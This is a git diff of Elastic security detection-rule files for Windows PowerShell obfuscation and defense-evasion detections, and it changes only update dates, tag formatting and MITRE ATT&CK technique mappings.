= "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml index 7a8c30ffcd2..7e8558da51c 100644 --- a/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml +++ b/rules/windows/defense_evasion_persistence_account_tokenfilterpolicy.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/01" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -66,7 +66,20 @@ references = [ risk_score = 47 rule_id = "07b1ef73-1fde-4a49-a34a-5dd40011b076" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -96,23 +109,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1548.002" -name = "Bypass User Account Control" -reference = "https://attack.mitre.org/techniques/T1548/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.002" +name = "Pass the Hash" +reference = "https://attack.mitre.org/techniques/T1550/002/" + + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/defense_evasion_posh_assembly_load.toml b/rules/windows/defense_evasion_posh_assembly_load.toml index 0282253c16e..b21cc5070cd 100644 --- a/rules/windows/defense_evasion_posh_assembly_load.toml +++ b/rules/windows/defense_evasion_posh_assembly_load.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/15" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -148,34 +148,49 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" +[[rule.threat.technique.subtechnique]] +id = "T1055.001" +name = "Dynamic-link Library Injection" +reference = "https://attack.mitre.org/techniques/T1055/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1055.002" +name = "Portable Executable Injection" +reference = "https://attack.mitre.org/techniques/T1055/002/" + [[rule.threat.technique]] id = "T1620" name = "Reflective Code Loading" reference = "https://attack.mitre.org/techniques/T1620/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_compressed.toml b/rules/windows/defense_evasion_posh_compressed.toml index 065a298153f..1af9d0caffa 100644 --- a/rules/windows/defense_evasion_posh_compressed.toml +++ b/rules/windows/defense_evasion_posh_compressed.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/19" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -112,7 +112,14 @@ Setup instructions: https://ela.st/powershell-logging-setup This rule uses the following fields that require the Windows Integration v3.3.0 and up: `powershell.file.script_block_entropy_bits`. """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: PowerShell Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs", +] timestamp_override = "event.ingested" type = "query" @@ -142,7 +149,6 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" @@ -153,28 +159,29 @@ id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_defender_tampering.toml b/rules/windows/defense_evasion_posh_defender_tampering.toml index f0dfa740cda..c4d50b64d01 100644 --- a/rules/windows/defense_evasion_posh_defender_tampering.toml +++ b/rules/windows/defense_evasion_posh_defender_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/11" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -144,21 +144,39 @@ not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_encryption.toml b/rules/windows/defense_evasion_posh_encryption.toml index 6e4a932d0bc..c5e38dabe16 100644 --- a/rules/windows/defense_evasion_posh_encryption.toml +++ b/rules/windows/defense_evasion_posh_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/23" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -97,7 +97,14 @@ This behavior can be legitimate (protecting configuration values, packaging cont risk_score = 47 rule_id = "1d9aeb0b-9549-46f6-a32d-05e2a001b7fd" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Impact", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -133,29 +140,22 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1486" -name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_high_entropy.toml b/rules/windows/defense_evasion_posh_high_entropy.toml index 97903280a6b..4519eaa5024 100644 --- a/rules/windows/defense_evasion_posh_high_entropy.toml +++ b/rules/windows/defense_evasion_posh_high_entropy.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/08" [rule] author = ["Elastic"] @@ -115,7 +115,14 @@ Setup instructions: https://ela.st/powershell-logging-setup This rule uses the following fields that require the Windows Integration v3.3.0 and up: `powershell.file.script_block_entropy_bits`, `powershell.file.script_block_surprisal_stdev`, and `powershell.file.script_block_length`. """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "query" @@ -135,39 +142,40 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation.toml b/rules/windows/defense_evasion_posh_obfuscation.toml index 65d2f5c7b65..3f18767f36a 100644 --- a/rules/windows/defense_evasion_posh_obfuscation.toml +++ b/rules/windows/defense_evasion_posh_obfuscation.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/03" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -59,7 +59,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -115,36 +122,36 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml index be379bc9284..98b2aa03bc7 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_backtick.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_backtick.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -109,7 +109,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -160,39 +167,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml index 47250fb084a..8f1bd286cb1 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_backtick_var.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -100,7 +100,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -144,39 +151,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml index 145c241a756..c138be71ed7 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_char_arrays.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -82,7 +82,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -127,39 +134,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml index 768f4aeb483..4b1409da8c8 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_concat_dynamic.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -112,7 +112,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -154,39 +161,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml index 4bc50165fbf..9f3f14ce734 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_high_number_proportion.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -79,7 +79,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -140,39 +147,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml index 7f5472b2a96..68743a18154 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_iex_env_vars_reconstruction.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -95,7 +95,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -142,39 +149,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml index e3e40c756d6..7ee84b163a3 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_iex_string_reconstruction.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -101,7 +101,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -156,39 +163,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml index 938cd397a2b..f876139f3e3 100644 --- a/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml +++ b/rules/windows/defense_evasion_posh_obfuscation_index_reversal.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/14" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -82,7 +82,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -137,44 +144,39 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" 